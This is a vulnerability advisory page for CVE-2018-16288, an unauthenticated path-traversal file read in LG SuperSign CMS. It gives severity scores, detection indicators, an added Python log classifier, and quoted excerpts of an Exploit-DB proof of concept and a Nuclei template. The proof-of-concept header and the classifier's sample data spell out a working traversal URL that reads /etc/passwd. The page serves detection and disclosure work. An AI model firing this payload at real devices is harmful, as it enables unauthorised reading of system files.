CVE-2018-16288
Published: 2018-09-14

CVE-2018-16288: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.

Priority: P269 · high · 8.6 (CVSS 3.0)
Vector: AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:N / A:N
EXPLOIT
EPSS: 35.26% (98.2th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lg | supersign_cms | — | — |
Detection & IOCs (extracted from sources)
- Detect unauthenticated HTTP GET requests to the vulnerable LFI path on port 9080 containing path traversal sequences (%2f..%2f) targeting /signEzUI/playlist/edit/upload/
- No authentication is required to exploit this LFI; alert on any request to the vulnerable path regardless of session/auth headers
- A successful exploitation response will contain Unix passwd file content matching root:.*:0:0: with HTTP 200 status
- The exploit was tested specifically against Web OS 4.0; behavior on other versions may differ
- The vulnerable service listens on port 9080; ensure network monitoring covers this non-standard HTTP port
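The detection notes above, turned into a classifier for logged HTTP transactions. This is an added example, not code from the advisory or its sources; the record layout, function names and sample transactions are constructed assumptions. It decodes the path before matching and never looks at authentication headers.

```python
import re
from urllib.parse import unquote

# Path prefix from the detection notes; compared case-insensitively.
VULN_PREFIX = "/signezui/playlist/edit/upload/"
# Response marker from the detection notes: Unix passwd content.
PASSWD_RE = re.compile(r"root:.*:0:0:")

# Constructed sample transactions: (dst_port, method, raw_path, status, body)
SAMPLE = [
    (9080, "GET", "/signEzUI/playlist/edit/upload/..%2f..%2f..%2f../etc/passwd",
     200, "root:x:0:0:root:/root:/bin/sh\n"),
    (9080, "GET", "/signEzUI/playlist/edit/upload/..%2F..%2Fetc%2Fhosts", 404, ""),
    (9080, "GET", "/signEzUI/playlist/edit/upload/banner.png", 200, "\x89PNG"),
    (9080, "GET", "/signEzUI/login", 200, "<html>"),
]

def decode_fully(path, max_rounds=3):
    """Percent-decode until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(method, raw_path, status, body=""):
    """Return 'none', 'attempt' or 'success' for one HTTP transaction."""
    path = decode_fully(raw_path.split("?", 1)[0]).replace("\\", "/")
    idx = path.lower().find(VULN_PREFIX)
    if method.upper() != "GET" or idx == -1:
        return "none"
    # Only a ".." path segment after the upload prefix counts as traversal.
    remainder = path[idx + len(VULN_PREFIX):]
    if ".." not in remainder.split("/"):
        return "none"
    if status == 200 and PASSWD_RE.search(body):
        return "success"
    # A 200 without passwd content may still be a read of another file.
    return "attempt"

def scan(records):
    """Return (raw_path, verdict) for every record that is not benign."""
    verdicts = ((rec[2], classify(*rec[1:])) for rec in records)
    return [(p, v) for p, v in verdicts if v != "none"]

if __name__ == "__main__":
    for path, verdict in scan(SAMPLE):
        print(f"{verdict.upper():8} {path}")
```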
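CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.6 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
| nvd | v2.0 | 7.8 | HIGH | AV:N/AC:L/Au:N/C:C/I:N/A:N |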
No detection rules found.
Exploit-DB
LG SuperSign EZ CMS 2.5 - Local File Inclusion
exploitdb·2018-09-19·CVSS 8.6
CVE-2018-16288 [HIGH] LG SuperSign EZ CMS 2.5 - Local File Inclusion
---
```python
# Exploit Title: LG SuperSign EZ CMS 2.5 - Local File Inclusion
# Date: 2018-09-13
# Exploit Author: Alejandro Fanjul
# Vendor Homepage: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSign EZ (CMS)
# Tested on: Web OS 4.0
# CVE : CVE-2018-16288
# More info: http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
# Any user can read files from the TV, without authentication due to an existing LFI in the following path:
# http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
# PoC
import requests
import re
from argparse import ArgumentParser
parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target"
```
Nuclei
LG SuperSign EZ CMS 2.5 - Local File Inclusion
nuclei·CVSS 8.6
CVE-2018-16288 [HIGH] LG SuperSign EZ CMS 2.5 - Local File Inclusion
LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.
Template:
```yaml
id: CVE-2018-16288
info:
  name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS.
  reference:
    - https://www.exploit-db.com/exploits/45440
    - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulner
```
Published: 2018-09-14